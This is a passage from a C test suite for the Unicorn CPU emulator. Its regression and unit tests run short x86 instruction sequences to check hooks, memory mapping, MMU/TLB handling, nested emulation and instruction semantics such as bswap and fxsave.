OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_edx == 0x788f); OK(uc_close(uc)); } typedef struct _HOOK_TCG_OP_RESULT { uint64_t address; uint64_t arg1; uint64_t arg2; } HOOK_TCG_OP_RESULT; typedef struct _HOOK_TCG_OP_RESULTS { HOOK_TCG_OP_RESULT results[128]; uint64_t len; } HOOK_TCG_OP_RESULTS; static void test_x86_hook_tcg_op_cb(uc_engine *uc, uint64_t address, uint64_t arg1, uint64_t arg2, uint32_t size, void *data) { HOOK_TCG_OP_RESULTS *results = (HOOK_TCG_OP_RESULTS *)data; HOOK_TCG_OP_RESULT *result = &results->results[results->len++]; result->address = address; result->arg1 = arg1; result->arg2 = arg2; } static void test_x86_hook_tcg_op(void) { uc_engine *uc; uc_hook h; int flag; HOOK_TCG_OP_RESULTS results; // sub esi, [0x1000]; // sub eax, ebx; // sub eax, 1; // cmp eax, 0; // cmp ebx, edx; // cmp esi, [0x1000]; char code[] = "\x2b\x35\x00\x10\x00\x00\x29\xd8\x83\xe8\x01\x83\xf8\x00\x39" "\xd3\x3b\x35\x00\x10\x00\x00"; int r_eax = 0x1234; int r_ebx = 2; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_reg_write(uc, UC_X86_REG_EBX, &r_ebx)); memset(&results, 0, sizeof(HOOK_TCG_OP_RESULTS)); flag = 0; OK(uc_hook_add(uc, &h, UC_HOOK_TCG_OPCODE, test_x86_hook_tcg_op_cb, &results, 0, -1, UC_TCG_OP_SUB, flag)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_hook_del(uc, h)); TEST_CHECK(results.len == 6); memset(&results, 0, sizeof(HOOK_TCG_OP_RESULTS)); flag = UC_TCG_OP_FLAG_DIRECT; OK(uc_hook_add(uc, &h, UC_HOOK_TCG_OPCODE, test_x86_hook_tcg_op_cb, &results, 0, -1, UC_TCG_OP_SUB, flag)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_hook_del(uc, h)); TEST_CHECK(results.len == 3); memset(&results, 0, sizeof(HOOK_TCG_OP_RESULTS)); flag = UC_TCG_OP_FLAG_CMP; OK(uc_hook_add(uc, &h, UC_HOOK_TCG_OPCODE, test_x86_hook_tcg_op_cb, &results, 0, -1, UC_TCG_OP_SUB, flag)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_hook_del(uc, h)); TEST_CHECK(results.len == 3); OK(uc_close(uc)); } static bool test_x86_cmpxchg_mem_hook(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t val, void *data) { if (type == UC_MEM_READ) { *((int *)data) |= 1; } else { *((int *)data) |= 2; } return true; } static void test_x86_cmpxchg(void) { uc_engine *uc; char code[] = "\x0F\xC7\x0D\xE0\xBE\xAD\xDE"; // cmpxchg8b [0xdeadbee0] int r_zero = 0; int r_aaaa = 0x41414141; uint64_t mem; uc_hook h; int result = 0; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_mem_map(uc, 0xdeadb000, 0x1000, UC_PROT_ALL)); OK(uc_hook_add(uc, &h, UC_HOOK_MEM_READ | UC_HOOK_MEM_WRITE, test_x86_cmpxchg_mem_hook, &result, 1, 0)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_zero)); OK(uc_reg_write(uc, UC_X86_REG_EAX, &r_zero)); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_aaaa)); OK(uc_reg_write(uc, UC_X86_REG_EBX, &r_aaaa)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, 0xdeadbee0, &mem, 8)); TEST_CHECK(mem == 0x4141414141414141); // Both read and write happened. TEST_CHECK(result == 3); OK(uc_close(uc)); } static void test_x86_nested_emu_start_cb(uc_engine *uc, uint64_t addr, size_t size, void *data) { OK(uc_emu_start(uc, code_start + 1, code_start + 2, 0, 0)); } static void test_x86_nested_emu_start(void) { uc_engine *uc; char code[] = "\x41\x4a"; // INC ecx; DEC edx; int r_ecx = 0x1234; int r_edx = 0x7890; uc_hook h; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); // Emulate DEC in the nested hook. OK(uc_hook_add(uc, &h, UC_HOOK_CODE, test_x86_nested_emu_start_cb, NULL, code_start, code_start)); // Emulate INC OK(uc_emu_start(uc, code_start, code_start + 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_ecx == 0x1235); TEST_CHECK(r_edx == 0x788f); OK(uc_close(uc)); } static void test_x86_nested_emu_stop_cb(uc_engine *uc, uint64_t addr, size_t size, void *data) { OK(uc_emu_start(uc, code_start + 1, code_start + 2, 0, 0)); // ecx shouldn't be changed! OK(uc_emu_stop(uc)); } static void test_x86_nested_emu_stop(void) { uc_engine *uc; // INC ecx; DEC edx; DEC edx; char code[] = "\x41\x4a\x4a"; int r_ecx = 0x1234; int r_edx = 0x7890; uc_hook h; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); // Emulate DEC in the nested hook. OK(uc_hook_add(uc, &h, UC_HOOK_CODE, test_x86_nested_emu_stop_cb, NULL, code_start, code_start)); OK(uc_emu_start(uc, code_start, code_start + 3, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_ecx == 0x1234); TEST_CHECK(r_edx == 0x788f); OK(uc_close(uc)); } static void test_x86_nested_emu_start_error_cb(uc_engine *uc, uint64_t addr, size_t size, void *data) { uc_assert_err(UC_ERR_READ_UNMAPPED, uc_emu_start(uc, code_start + 2, 0, 0, 0)); } static void test_x86_64_nested_emu_start_error(void) { uc_engine *uc; // "nop;nop;mov rax, [0x10000]" char code[] = "\x90\x90\x48\xa1\x00\x00\x01\x00\x00\x00\x00\x00"; uc_hook hk; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hk, UC_HOOK_CODE, test_x86_nested_emu_start_error_cb, NULL, code_start, code_start)); // This call shouldn't fail! OK(uc_emu_start(uc, code_start, code_start + 2, 0, 0)); OK(uc_close(uc)); } static void test_x86_eflags_reserved_bit(void) { uc_engine *uc; uint32_t r_eflags; OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_reg_read(uc, UC_X86_REG_EFLAGS, &r_eflags)); TEST_CHECK((r_eflags & 2) != 0); OK(uc_reg_write(uc, UC_X86_REG_EFLAGS, &r_eflags)); OK(uc_reg_read(uc, UC_X86_REG_EFLAGS, &r_eflags)); TEST_CHECK((r_eflags & 2) != 0); OK(uc_close(uc)); } static void test_x86_nested_uc_emu_start_exits_cb(uc_engine *uc, uint64_t addr, size_t size, void *data) { OK(uc_emu_start(uc, code_start + 5, code_start + 6, 0, 0)); } static void test_x86_nested_uc_emu_start_exits(void) { uc_engine *uc; // cmp eax, 0 // jnz t // nop <-- nested emu_start // t:mov dword ptr [eax], 0 char code[] = "\x83\xf8\x00\x75\x01\x90\xc7\x00\x00\x00\x00\x00"; uc_hook hk; uint32_t r_pc; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hk, UC_HOOK_CODE, test_x86_nested_uc_emu_start_exits_cb, NULL, code_start, code_start)); OK(uc_emu_start(uc, code_start, code_start + 5, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EIP, &r_pc)); TEST_CHECK(r_pc == code_start + 5); OK(uc_close(uc)); } static bool test_x86_correct_address_in_small_jump_hook_callback( uc_engine *uc, int type, uint64_t address, int size, int64_t value, void *user_data) { // Check registers uint64_t r_rax = 0x0; uint64_t r_rip = 0x0; OK(uc_reg_read(uc, UC_X86_REG_RAX, &r_rax)); OK(uc_reg_read(uc, UC_X86_REG_RIP, &r_rip)); TEST_CHECK(r_rax == 0x7F00); TEST_CHECK(r_rip == 0x7F00); // Check address // printf("%lx\n", address); TEST_CHECK(address == 0x7F00); return false; } static void test_x86_correct_address_in_small_jump_hook(void) { uc_engine *uc; // movabs $0x7F00, %rax // jmp *%rax char code[] = "\x48\xb8\x00\x7F\x00\x00\x00\x00\x00\x00\xff\xe0"; uint64_t r_rax = 0x0; uint64_t r_rip = 0x0; uc_hook hook; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_UNMAPPED, test_x86_correct_address_in_small_jump_hook_callback, NULL, 1, 0)); uc_assert_err( UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_RAX, &r_rax)); OK(uc_reg_read(uc, UC_X86_REG_RIP, &r_rip)); TEST_CHECK(r_rax == 0x7F00); TEST_CHECK(r_rip == 0x7F00); OK(uc_close(uc)); } static bool test_x86_correct_address_in_long_jump_hook_callback( uc_engine *uc, int type, uint64_t address, int size, int64_t value, void *user_data) { // Check registers uint64_t r_rax = 0x0; uint64_t r_rip = 0x0; OK(uc_reg_read(uc, UC_X86_REG_RAX, &r_rax)); OK(uc_reg_read(uc, UC_X86_REG_RIP, &r_rip)); TEST_CHECK(r_rax == 0x7FFFFFFFFFFFFF00); TEST_CHECK(r_rip == 0x7FFFFFFFFFFFFF00); // Check address // printf("%lx\n", address); TEST_CHECK(address == 0x7FFFFFFFFFFFFF00); return false; } static void test_x86_correct_address_in_long_jump_hook(void) { uc_engine *uc; // movabs $0x7FFFFFFFFFFFFF00, %rax // jmp *%rax char code[] = "\x48\xb8\x00\xff\xff\xff\xff\xff\xff\x7f\xff\xe0"; uint64_t r_rax = 0x0; uint64_t r_rip = 0x0; uc_hook hook; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL)); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_UNMAPPED, test_x86_correct_address_in_long_jump_hook_callback, NULL, 1, 0)); uc_assert_err( UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_RAX, &r_rax)); OK(uc_reg_read(uc, UC_X86_REG_RIP, &r_rip)); TEST_CHECK(r_rax == 0x7FFFFFFFFFFFFF00); TEST_CHECK(r_rip == 0x7FFFFFFFFFFFFF00); OK(uc_close(uc)); } static void test_x86_invalid_vex_l(void) { uc_engine *uc; /* vmovdqu ymm1, [rcx] */ char code[] = {'\xC5', '\xFE', '\x6F', '\x09'}; /* initialize memory and run emulation */ OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_mem_map(uc, 0, 2 * 1024 * 1024, UC_PROT_ALL)); OK(uc_mem_write(uc, 0, code, sizeof(code) / sizeof(code[0]))); uc_assert_err(UC_ERR_INSN_INVALID, uc_emu_start(uc, 0, sizeof(code) / sizeof(code[0]), 0, 0)); OK(uc_close(uc)); } // AARCH64 inline the read while s390x won't split the access. Though not tested // on other hosts but we restrict a bit more. #if !defined(TARGET_READ_INLINED) && defined(BOOST_LITTLE_ENDIAN) struct writelog_t { uint32_t addr, size; }; static void test_x86_unaligned_access_callback(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { TEST_CHECK(size != 0); struct writelog_t *write_log = (struct writelog_t *)user_data; for (int i = 0; i < 10; i++) { if (write_log[i].size == 0) { write_log[i].addr = (uint32_t)address; write_log[i].size = (uint32_t)size; return; } } TEST_ASSERT(false); } static void test_x86_unaligned_access(void) { uc_engine *uc; uc_hook hook; // mov dword ptr [0x200001], eax; mov eax, dword ptr [0x200001] char code[] = "\xa3\x01\x00\x20\x00\xa1\x01\x00\x20\x00"; uint32_t r_eax = LEINT32(0x41424344); struct writelog_t write_log[10]; struct writelog_t read_log[10]; memset(write_log, 0, sizeof(write_log)); memset(read_log, 0, sizeof(read_log)); uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_mem_map(uc, 0x200000, 0x1000, UC_PROT_ALL)); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_WRITE, test_x86_unaligned_access_callback, write_log, 1, 0)); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_READ, test_x86_unaligned_access_callback, read_log, 1, 0)); OK(uc_reg_write(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); TEST_CHECK(write_log[0].addr == 0x200001); TEST_CHECK(write_log[0].size == 4); TEST_CHECK(write_log[1].size == 0); TEST_CHECK(read_log[0].addr == 0x200001); TEST_CHECK(read_log[0].size == 4); TEST_CHECK(read_log[1].size == 0); char b; OK(uc_mem_read(uc, 0x200001, &b, 1)); TEST_CHECK(b == 0x44); OK(uc_mem_read(uc, 0x200002, &b, 1)); TEST_CHECK(b == 0x43); OK(uc_mem_read(uc, 0x200003, &b, 1)); TEST_CHECK(b == 0x42); OK(uc_mem_read(uc, 0x200004, &b, 1)); TEST_CHECK(b == 0x41); OK(uc_close(uc)); } #endif static bool test_x86_lazy_mapping_mem_callback(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { OK(uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x1000, "\x90\x90", 2)); // nop; nop // Handled! return true; } static void test_x86_lazy_mapping_block_callback(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { int *block_count = (int *)user_data; (*block_count)++; } static void test_x86_lazy_mapping(void) { uc_engine *uc; uc_hook mem_hook, block_hook; int block_count = 0; OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_hook_add(uc, &mem_hook, UC_HOOK_MEM_FETCH_UNMAPPED, test_x86_lazy_mapping_mem_callback, NULL, 1, 0)); OK(uc_hook_add(uc, &block_hook, UC_HOOK_BLOCK, test_x86_lazy_mapping_block_callback, &block_count, 1, 0)); OK(uc_emu_start(uc, 0x1000, 0x1002, 0, 0)); TEST_CHECK(block_count == 1); OK(uc_close(uc)); } static void test_x86_16_incorrect_ip_cb(uc_engine *uc, uint64_t address, uint32_t size, void *data) { uint16_t cs, ip; OK(uc_reg_read(uc, UC_X86_REG_CS, &cs)); OK(uc_reg_read(uc, UC_X86_REG_IP, &ip)); TEST_CHECK(cs == 0x20); TEST_CHECK(address == ((cs << 4) + ip)); } static void test_x86_16_incorrect_ip(void) { uc_engine *uc; uc_hook hk1, hk2; uint16_t cs = 0x20; char code[] = "\x41"; // INC cx; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_16, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hk1, UC_HOOK_BLOCK, test_x86_16_incorrect_ip_cb, NULL, 1, 0)); OK(uc_hook_add(uc, &hk2, UC_HOOK_CODE, test_x86_16_incorrect_ip_cb, NULL, 1, 0)); OK(uc_reg_write(uc, UC_X86_REG_CS, &cs)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static void test_x86_mmu_prepare_tlb(uc_engine *uc, uint64_t vaddr, uint64_t tlb_base) { uint64_t cr0; uint64_t cr4; uc_x86_msr msr = {.rid = 0x0c0000080, .value = 0}; uint64_t pml4o = ((vaddr & 0x00ff8000000000) >> 39) * 8; uint64_t pdpo = ((vaddr & 0x00007fc0000000) >> 30) * 8; uint64_t pdo = ((vaddr & 0x0000003fe00000) >> 21) * 8; uint64_t pml4e = (tlb_base + 0x1000) | 1 | (1 << 2); uint64_t pdpe = (tlb_base + 0x2000) | 1 | (1 << 2); uint64_t pde = (tlb_base + 0x3000) | 1 | (1 << 2); OK(uc_mem_write(uc, tlb_base + pml4o, &pml4e, sizeof(pml4o))); OK(uc_mem_write(uc, tlb_base + 0x1000 + pdpo, &pdpe, sizeof(pdpe))); OK(uc_mem_write(uc, tlb_base + 0x2000 + pdo, &pde, sizeof(pde))); OK(uc_reg_write(uc, UC_X86_REG_CR3, &tlb_base)); OK(uc_reg_read(uc, UC_X86_REG_CR0, &cr0)); OK(uc_reg_read(uc, UC_X86_REG_CR4, &cr4)); OK(uc_reg_read(uc, UC_X86_REG_MSR, &msr)); cr0 |= 1; cr0 |= 1l << 31; cr4 |= 1l << 5; msr.value |= 1l << 8; OK(uc_reg_write(uc, UC_X86_REG_CR0, &cr0)); OK(uc_reg_write(uc, UC_X86_REG_CR4, &cr4)); OK(uc_reg_write(uc, UC_X86_REG_MSR, &msr)); } static void test_x86_mmu_pt_set(uc_engine *uc, uint64_t vaddr, uint64_t paddr, uint64_t tlb_base) { uint64_t pto = ((vaddr & 0x000000001ff000) >> 12) * 8; uint32_t pte = (paddr) | 1 | (1 << 2); uc_mem_write(uc, tlb_base + 0x3000 + pto, &pte, sizeof(pte)); } static void test_x86_mmu_callback(uc_engine *uc, void *userdata) { bool *parrent_done = userdata; uint64_t rax; OK(uc_reg_read(uc, UC_X86_REG_RAX, &rax)); switch (rax) { case 57: /* fork */ break; case 60: /* exit */ uc_emu_stop(uc); return; default: TEST_CHECK(false); } if (!(*parrent_done)) { *parrent_done = true; rax = 27; OK(uc_reg_write(uc, UC_X86_REG_RAX, &rax)); uc_emu_stop(uc); } } static void test_x86_mmu(void) { bool parrent_done = false; uint64_t tlb_base = 0x3000; uint64_t parrent, child; uint64_t rax, rip; uc_context *context; uc_engine *uc; uc_hook h1; /* * mov rax, 57 * syscall * test rax, rax * jz child * xor rax, rax * mov rax, 60 * mov [0x4000], rax * syscall * * child: * xor rcx, rcx * mov rcx, 42 * mov [0x4000], rcx * mov rax, 60 * syscall */ char code[] = "\xB8\x39\x00\x00\x00\x0F\x05\x48\x85\xC0\x74\x0F\xB8\x3C\x00\x00\x00" "\x48\x89\x04\x25\x00\x40\x00\x00\x0F\x05\xB9\x2A\x00\x00\x00\x48\x89" "\x0C\x25\x00\x40\x00\x00\xB8\x3C\x00\x00\x00\x0F\x05"; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_ctl_tlb_mode(uc, UC_TLB_CPU)); OK(uc_hook_add(uc, &h1, UC_HOOK_INSN, &test_x86_mmu_callback, &parrent_done, 1, 0, UC_X86_INS_SYSCALL)); OK(uc_context_alloc(uc, &context)); OK(uc_mem_map(uc, 0x0, 0x1000, UC_PROT_ALL)); // Code OK(uc_mem_write(uc, 0x0, code, sizeof(code) - 1)); OK(uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL)); // Parrent OK(uc_mem_map(uc, 0x2000, 0x1000, UC_PROT_ALL)); // Child OK(uc_mem_map(uc, tlb_base, 0x4000, UC_PROT_ALL)); // TLB test_x86_mmu_prepare_tlb(uc, 0x0, tlb_base); test_x86_mmu_pt_set(uc, 0x2000, 0x0, tlb_base); test_x86_mmu_pt_set(uc, 0x4000, 0x1000, tlb_base); OK(uc_ctl_flush_tlb(uc)); OK(uc_emu_start(uc, 0x2000, 0x0, 0, 0)); OK(uc_context_save(uc, context)); OK(uc_reg_read(uc, UC_X86_REG_RIP, &rip)); OK(uc_emu_start(uc, rip, 0x0, 0, 0)); /* restore for child */ OK(uc_context_restore(uc, context)); test_x86_mmu_prepare_tlb(uc, 0x0, tlb_base); test_x86_mmu_pt_set(uc, 0x4000, 0x2000, tlb_base); rax = 0; OK(uc_reg_write(uc, UC_X86_REG_RAX, &rax)); OK(uc_ctl_flush_tlb(uc)); OK(uc_emu_start(uc, rip, 0x0, 0, 0)); OK(uc_mem_read(uc, 0x1000, &parrent, sizeof(parrent))); OK(uc_mem_read(uc, 0x2000, &child, sizeof(child))); TEST_CHECK(parrent == 60); TEST_CHECK(child == 42); } static bool test_x86_vtlb_callback(uc_engine *uc, uint64_t addr, uc_mem_type type, uc_tlb_entry *result, void *user_data) { result->paddr = addr; result->perms = UC_PROT_ALL; return true; } static void test_x86_vtlb(void) { uc_engine *uc; uc_hook hook; char code[] = "\xeb\x02\x90\x90\x90\x90\x90\x90"; // jmp 4; nop; nop; nop; // nop; nop; nop uint64_t r_eip = 0; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL)); OK(uc_hook_add(uc, &hook, UC_HOOK_TLB_FILL, test_x86_vtlb_callback, NULL, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + 4, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EIP, &r_eip)); TEST_CHECK(r_eip == code_start + 4); OK(uc_close(uc)); } static void test_x86_segmentation(void) { uc_engine *uc; uint64_t fs = 0x53; uc_x86_mmr gdtr = {0, 0xfffff8076d962000, 0x57, 0}; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_reg_write(uc, UC_X86_REG_GDTR, &gdtr)); uc_assert_err(UC_ERR_EXCEPTION, uc_reg_write(uc, UC_X86_REG_FS, &fs)); } static void test_x86_0xff_lcall_callback(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { // do nothing return; } // This aborts prior to a7a5d187e77f7853755eff4768658daf8095c3b7 static void test_x86_0xff_lcall(void) { uc_engine *uc; uc_hook hk; const char code[] = "\xB8\x01\x00\x00\x00\xBB\x01\x00\x00\x00\xB9\x01\x00\x00\x00\xFF\xDD" "\xBA\x01\x00\x00\x00\xB8\x02\x00\x00\x00\xBB\x02\x00\x00\x00"; // Taken from #1842 // 0: b8 01 00 00 00 mov eax,0x1 // 5: bb 01 00 00 00 mov ebx,0x1 // a: b9 01 00 00 00 mov ecx,0x1 // f: ff (bad) // 10: dd ba 01 00 00 00 fnstsw WORD PTR [edx+0x1] // 16: b8 02 00 00 00 mov eax,0x2 // 1b: bb 02 00 00 00 mov ebx,0x2 uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hk, UC_HOOK_CODE, test_x86_0xff_lcall_callback, NULL, 1, 0)); uc_assert_err( UC_ERR_INSN_INVALID, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static bool test_x86_64_not_overwriting_tmp0_for_pc_update_cb( uc_engine *uc, uc_mem_type type, uint64_t address, int size, uint64_t value, void *user_data) { return true; } // https://github.com/unicorn-engine/unicorn/issues/1717 // https://github.com/unicorn-engine/unicorn/issues/1862 static void test_x86_64_not_overwriting_tmp0_for_pc_update(void) { uc_engine *uc; uc_hook hk; const char code[] = "\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xff\x48\x89\x0c" "\x24\x48\xd3\x24\x24\x73\x0a"; uint64_t rsp, pc, eflags; // 0x1000: movabs rcx, 0xffffffffffffffff // 0x100a: mov qword ptr [rsp], rcx // 0x100e: shl qword ptr [rsp], cl ; (Shift to CF=1) // 0x1012: jae 0xd ; this jump should not be taken! (CF=1 but jae // expects CF=0) uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hk, UC_HOOK_MEM_READ | UC_HOOK_MEM_WRITE, test_x86_64_not_overwriting_tmp0_for_pc_update_cb, NULL, 1, 0)); rsp = 0x2000; OK(uc_reg_write(uc, UC_X86_REG_RSP, (void *)&rsp)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 4)); OK(uc_reg_read(uc, UC_X86_REG_RIP, &pc)); OK(uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags)); TEST_CHECK(pc == 0x1014); TEST_CHECK((eflags & 0x1) == 1); OK(uc_close(uc)); } static void test_fxsave_fpip_x86(void) { // note: fxsave was introduced in Pentium II uint8_t code_x86[] = { // help testing through NOP offset [disassembly in at&t syntax] 0x90, 0x90, 0x90, 0x90, // nop nop nop nop // run a floating point instruction 0xdb, 0xc9, // fcmovne %st(1), %st // fxsave needs 512 bytes of storage space 0x81, 0xec, 0x00, 0x02, 0x00, 0x00, // subl $512, %esp // fxsave needs a 16-byte aligned address for storage 0x83, 0xe4, 0xf0, // andl $0xfffffff0, %esp // store fxsave data on the stack 0x0f, 0xae, 0x04, 0x24, // fxsave (%esp) // fxsave stores FPIP at an 8-byte offset, move FPIP to eax register 0x8b, 0x44, 0x24, 0x08 // movl 0x8(%esp), %eax }; uint32_t X86_NOP_OFFSET = 4; uint32_t stack_top = (uint32_t)MEM_STACK; uint32_t value; uc_engine *uc; // initialize emulator in X86-32bit mode OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); // map 1MB of memory for this emulation OK(uc_mem_map(uc, MEM_BASE, MEM_SIZE, UC_PROT_ALL)); OK(uc_mem_write(uc, MEM_TEXT, code_x86, sizeof(code_x86))); OK(uc_reg_write(uc, UC_X86_REG_ESP, &stack_top)); OK(uc_emu_start(uc, MEM_TEXT, MEM_TEXT + sizeof(code_x86), 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EAX, &value)); TEST_CHECK(value == ((uint32_t)MEM_TEXT + X86_NOP_OFFSET)); OK(uc_mem_unmap(uc, MEM_BASE, MEM_SIZE)); OK(uc_close(uc)); } static void test_fxsave_fpip_x64(void) { uint8_t code_x64[] = { // help testing through NOP offset [disassembly in at&t] 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, // nops // run a floating point instruction 0xdb, 0xc9, // fcmovne %st(1), %st // fxsave64 needs 512 bytes of storage space 0x48, 0x81, 0xec, 0x00, 0x02, 0x00, 0x00, // subq $512, %rsp // fxsave needs a 16-byte aligned address for storage 0x48, 0x83, 0xe4, 0xf0, // andq 0xfffffffffffffff0, %rsp // store fxsave64 data on the stack 0x48, 0x0f, 0xae, 0x04, 0x24, // fxsave64 (%rsp) // fxsave64 stores FPIP at an 8-byte offset, move FPIP to rax register 0x48, 0x8b, 0x44, 0x24, 0x08, // movq 0x8(%rsp), %rax }; uint64_t stack_top = (uint64_t)MEM_STACK; uint64_t X64_NOP_OFFSET = 8; uint64_t value; uc_engine *uc; // initialize emulator in X86-32bit mode OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); // map 1MB of memory for this emulation OK(uc_mem_map(uc, MEM_BASE, MEM_SIZE, UC_PROT_ALL)); OK(uc_mem_write(uc, MEM_TEXT, code_x64, sizeof(code_x64))); OK(uc_reg_write(uc, UC_X86_REG_RSP, &stack_top)); OK(uc_emu_start(uc, MEM_TEXT, MEM_TEXT + sizeof(code_x64), 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_RAX, &value)); TEST_CHECK(value == ((uint64_t)MEM_TEXT + X64_NOP_OFFSET)); OK(uc_mem_unmap(uc, MEM_BASE, MEM_SIZE)); OK(uc_close(uc)); } static void test_bswap_ax(void) { // References: // - https://gynvael.coldwind.pl/?id=268 // - https://github.com/JonathanSalwan/Triton/issues/1131 { uint8_t code[] = { // bswap ax 0x66, 0x0F, 0xC8, }; TEST_CODE(UC_MODE_32, code); TEST_IN_REG(EAX, 0x44332211); TEST_OUT_REG(EAX, 0x44330000); TEST_RUN(); } { uint8_t code[] = { // bswap ax 0x66, 0x0F, 0xC8, }; TEST_CODE(UC_MODE_64, code); TEST_IN_REG(RAX, 0x8877665544332211); TEST_OUT_REG(RAX, 0x8877665544330000); TEST_RUN(); } { uint8_t code[] = { // bswap rax (66h ignored) 0x66, 0x48, 0x0F, 0xC8, }; TEST_CODE(UC_MODE_64, code); TEST_IN_REG(RAX, 0x8877665544332211); TEST_OUT_REG(RAX, 0x1122334455667788); TEST_RUN(); } { uint8_t code[] = { // bswap ax (rex ignored) 0x48, 0x66, 0x0F, 0xC8, }; TEST_CODE(UC_MODE_64, code); TEST_IN_REG(RAX, 0x8877665544332211); TEST_OUT_REG(RAX, 0x8877665544330000); TEST_RUN(); } { uint8_t code[] = { // bswap eax 0x0F, 0xC8, }; TEST_CODE(UC_MODE_32, code); TEST_IN_REG(EAX, 0x44332211); TEST_OUT_REG(EAX, 0x11223344); TEST_RUN(); } { uint8_t code[] = { // bswap eax 0x0F, 0xC8, }; TEST_CODE(UC_MODE_64, code); TEST_IN_REG(RAX, 0x8877665544332211); TEST_OUT_REG(RAX, 0x0000000011223344); TEST_RUN(); } } static void test_rex_x64(void) { { uint8_t code[] = { // mov ax, bx (rex.w ignored) 0x48, 0x66, 0x89, 0xD8, }; TEST_CODE(UC_MODE_64, code); TEST_IN_REG(RAX, 0x8877665544332211); TEST_IN_REG(RBX, 0x1122334455667788); TEST_OUT_REG(RAX, 0x8877665544337788); TEST_RUN(); } { uint8_t code[] = { // mov rax, rbx (66h ignored) 0x66, 0x48, 0x89, 0xD8, }; TEST_CODE(UC_MODE_64, code); TEST_IN_REG(RAX, 0x8877665544332211); TEST_IN_REG(RBX, 0x1122334455667788); TEST_OUT_REG(RAX, 0x1122334455667788); TEST_RUN(); } { uint8_t code[] = { // mov ax, bx (expected encoding) 0x66, 0x89, 0xD8, }; TEST_CODE(UC_MODE_64, code); TEST_IN_REG(RAX, 0x8877665544332211); 